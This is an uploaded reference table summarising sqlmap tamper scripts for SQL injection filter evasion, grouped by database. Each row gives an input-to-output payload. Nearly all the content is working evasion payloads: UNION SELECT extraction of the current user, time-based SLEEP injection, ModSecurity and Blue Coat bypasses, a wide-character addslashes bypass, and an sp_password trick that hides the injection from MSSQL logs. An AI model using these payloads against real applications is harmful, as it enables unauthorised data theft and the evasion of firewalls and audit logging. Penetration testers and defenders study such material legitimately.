Sqlmap tamper scripts for bypassing filters: a categorized summary

The document provides a comprehensive list of supported databases and their corresponding identifiers, including MSSQL, MySQL, Oracle, and PostgreSQL. It also details various tamper scripts used to bypass SQL injection filters, explaining their functions and the database types they are compatible with. Additionally, it includes examples of SQL queries and their tampered outputs for different database systems.

Uploaded by spe3ter

Summary of sqlmap tamper scripts for bypassing filters, by category

| Database | Script | Function | Example (input → output) | Tested against |
|---|---|---|---|---|
| ALL | apostrophemask.py | Replaces the apostrophe character with its UTF-8 encoded counterpart | `1 AND '1'='1` → `1 AND %EF%BC%871%EF%BC%87=%EF%BC%871` | |
| ALL | base64encode.py | Base64-encodes the whole payload | `1' AND SLEEP(5)#` → `MScgQU5EIFNMRUVQKDUpIw==` | |
| ALL | multiplespaces.py | Adds multiple spaces around SQL keywords | `1 UNION SELECT foobar` → `1   UNION   SELECT   foobar` | |
| ALL | space2plus.py | Replaces the space character with '+' | `SELECT id FROM users` → `SELECT+id+FROM+users` | |
| ALL | nonrecursivereplacement.py | Doubles the SQL keywords in the query: replaces predefined SQL keywords with representations suitable for (non-recursive) replacement filters, e.g. .replace("SELECT", "") | `1 UNION SELECT 2--` → `1 UNIOUNIONN SELESELECTCT 2--` | |
| MSSQL | space2randomblank.py | Replaces the space character (' ') with a random blank character drawn from a valid set of alternate characters | `SELECT id FROM users` → `SELECT%0Did%0DFROM%0Ausers` | |
| MSSQL | unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | `-1 UNION ALL SELECT` → `-1 UNION SELECT` | |
| MSSQL | securesphere.py | Appends a specially crafted string | `1 AND 1=1` → `1 AND 1=1 and '0having'='0having'` | |
| MSSQL | space2hash.py | Bypasses filtering of '='; replaces the space character (' ') with a dash comment ('--') followed by a random string and a newline ('\n') | `1 AND 9227=9227` → `1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227` | |
| MSSQL | equaltolike.py | Replaces the equals sign with LIKE | `SELECT * FROM users WHERE id=1` → `SELECT * FROM users WHERE id LIKE 1` | |
| MSSQL | space2mssqlblank.py (mssql) | Replaces spaces with other blank characters | `SELECT id FROM users` → `SELECT%08id%02FROM%0Fusers` | Microsoft SQL Server 2000, 2005 |
| MSSQL | space2mssqlhash.py | Replaces spaces | `1 AND 9227=9227` → `1%23%0AAND%23%0A9227=9227` | |
| MSSQL | between.py | Replaces the greater-than operator (>) with BETWEEN | `1 AND A > B--` → `1 AND A NOT BETWEEN 0 AND B--` | |
| MSSQL | percentage.py | ASP allows a '%' sign to be prepended to each character | `SELECT FIELD FROM TABLE` → `%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E` | |
| MSSQL | sp_password.py | Appends 'sp_password' to the end of the payload so that the DBMS automatically obfuscates it in its logs | `1 AND 9227=9227-- ` → `1 AND 9227=9227-- sp_password` | |
| MSSQL | charencode.py | URL-encodes the payload | `SELECT FIELD FROM%20TABLE` → `%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45` | |
| MSSQL | randomcase.py | Randomizes letter case | `INSERT` → `InsERt` | |
| MSSQL | charunicodeencode.py | Unicode-encodes the string | `SELECT FIELD%20FROM TABLE` → `%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045` | |
| MSSQL | space2comment.py | Replaces the space character (' ') with comments '/**/' | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` | |
| MySQL | equaltolike.py | Replaces the equals sign with LIKE | `SELECT * FROM users WHERE id=1` → `SELECT * FROM users WHERE id LIKE 1` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5 |
| MySQL | greatest.py | Bypasses filtering of '>' by replacing the greater-than operator with GREATEST | `1 AND A > B` → `1 AND GREATEST(A,B+1)=A` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | apostrophenullencode.py | Bypasses double-quote filtering; replaces the apostrophe character and double quotes | `1 AND '1'='1` → `1 AND %00%271%00%27=%00%271` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | ifnull2ifisnull.py | Bypasses IFNULL filtering; replaces 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | `IFNULL(1, 2)` → `IF(ISNULL(1),2,1)` | MySQL 5.0 and 5.5 |
| MySQL | space2mssqlhash.py | Replaces spaces | `1 AND 9227=9227` → `1%23%0AAND%23%0A9227=9227` | |
| MySQL | modsecurityversioned.py | Filters spaces; encloses the complete query in a versioned comment | `1 AND 2>1--` → `1 /*!30874AND 2>1*/--` | MySQL 5.0 |
| MySQL | space2mysqlblank.py | Replaces spaces with other blank characters (MySQL) | `SELECT id FROM users` → `SELECT%0Bid%0BFROM%A0users` | MySQL 5.1 |
| MySQL | between.py | Replaces the greater-than operator (>) with BETWEEN | `1 AND A > B--` → `1 AND A NOT BETWEEN 0 AND B--` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | modsecurityzeroversioned.py | Encloses the complete query in a zero-versioned comment | `1 AND 2>1--` → `1 /*!00000AND 2>1*/--` | MySQL 5.0 |
| MySQL | space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a newline ('\n') | `1 AND 9227=9227` → `1--%0AAND--%0A9227=9227` | |
| MySQL | bluecoat.py | Replaces the space character after an SQL statement with a valid random blank character, then replaces '=' with LIKE | `SELECT id FROM users where id = 1` → `SELECT%09id FROM users where id LIKE 1` | MySQL 5.1, SGOS |
| MySQL | percentage.py | ASP allows a '%' sign to be prepended to each character | `SELECT FIELD FROM TABLE` → `%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E` | Microsoft SQL Server 2000, 2005; MySQL 5.1.56, 5.5.11; PostgreSQL 9.0 |
| MySQL | charencode.py | URL-encodes the payload | `SELECT FIELD FROM%20TABLE` → `%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | randomcase.py | Randomizes letter case | `INSERT` → `InsERt` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | versionedkeywords.py | Encloses each non-function keyword with a versioned MySQL comment | `1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#` → `1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#` | |
| MySQL | space2comment.py | Replaces the space character (' ') with comments '/**/' | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| MySQL | charunicodeencode.py | Unicode-encodes the string | `SELECT FIELD%20FROM TABLE` → `%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045` | Microsoft SQL Server 2000, 2005; MySQL 5.1.56; PostgreSQL 9.0.3 |
| MySQL | versionedmorekeywords.py | Comment-based bypass (versioned comments around keywords) | `1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#` → `1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#` | |
| MySQL | halfversionedmorekeywords.py | Adds a comment before each keyword (requires MySQL < 5.1) | `value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa` → `value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa` | MySQL 4.0.18, 5.0.22 |
| MySQL | halfversionedmorekeywords.py | Bypasses the firewall when the database is MySQL by adding a MySQL version comment before each keyword | `value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa` → `value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa` | MySQL 4.0.18, 5.0.22 |
| MySQL | space2morehash.py | Replaces spaces with a '#' sign followed by more random strings and newlines (requires MySQL >= 5.1) | `1 AND 9227=9227` → `1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227` | MySQL 5.1.41 |
| Oracle | greatest.py | Bypasses filtering of '>' by replacing the greater-than operator with GREATEST | `1 AND A > B` → `1 AND GREATEST(A,B+1)=A` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Oracle | apostrophenullencode.py | Bypasses double-quote filtering; replaces the apostrophe character and double quotes | `1 AND '1'='1` → `1 AND %00%271%00%27=%00%271` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Oracle | between.py | Replaces the greater-than operator (>) with BETWEEN | `1 AND A > B--` → `1 AND A NOT BETWEEN 0 AND B--` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Oracle | charencode.py | URL-encodes the payload | `SELECT FIELD FROM%20TABLE` → `%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Oracle | randomcase.py | Randomizes letter case | `INSERT` → `InsERt` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Oracle | charunicodeencode.py | Unicode-encodes the string | `SELECT FIELD%20FROM TABLE` → `%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045` | Microsoft SQL Server 2000, 2005; MySQL 5.1.56; PostgreSQL 9.0.3 |
| Oracle | space2comment.py | Replaces the space character (' ') with comments '/**/' | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | greatest.py | Bypasses filtering of '>' by replacing the greater-than operator with GREATEST | `1 AND A > B` → `1 AND GREATEST(A,B+1)=A` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | apostrophenullencode.py | Bypasses double-quote filtering; replaces the apostrophe character and double quotes | `1 AND '1'='1` → `1 AND %00%271%00%27=%00%271` | MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | between.py | Replaces the greater-than operator (>) with BETWEEN | `1 AND A > B--` → `1 AND A NOT BETWEEN 0 AND B--` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | percentage.py | ASP allows a '%' sign to be prepended to each character | `SELECT FIELD FROM TABLE` → `%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E` | Microsoft SQL Server 2000, 2005; MySQL 5.1.56, 5.5.11; PostgreSQL 9.0 |
| PostgreSQL | charencode.py | URL-encodes the payload | `SELECT FIELD FROM%20TABLE` → `%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | randomcase.py | Randomizes letter case | `INSERT` → `InsERt` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| PostgreSQL | charunicodeencode.py | Unicode-encodes the string | `SELECT FIELD%20FROM TABLE` → `%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045` | Microsoft SQL Server 2000, 2005; MySQL 5.1.56; PostgreSQL 9.0.3 |
| PostgreSQL | space2comment.py | Replaces the space character (' ') with comments '/**/' | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` | Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5; Oracle 10g; PostgreSQL 8.3, 8.4, 9.0 |
| Microsoft Access | appendnullbyte.py | Appends a URL-encoded null byte character at the end of the payload | `1 AND 1=1` → `1 AND 1=1%00` | |
| Other | chardoubleencode.py | Double URL-encodes the payload (already-encoded characters are not processed) | `SELECT FIELD FROM%20TABLE` → `%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545` | |
| Other | unmagicquotes.py | Wide-character bypass of GPC addslashes | `1' AND 1=1` → `1%bf%27 AND 1=1--%20` | |
| Other | randomcomments.py | Splits SQL keywords with /**/ | `INSERT` → `IN/**/S/**/ERT` | |
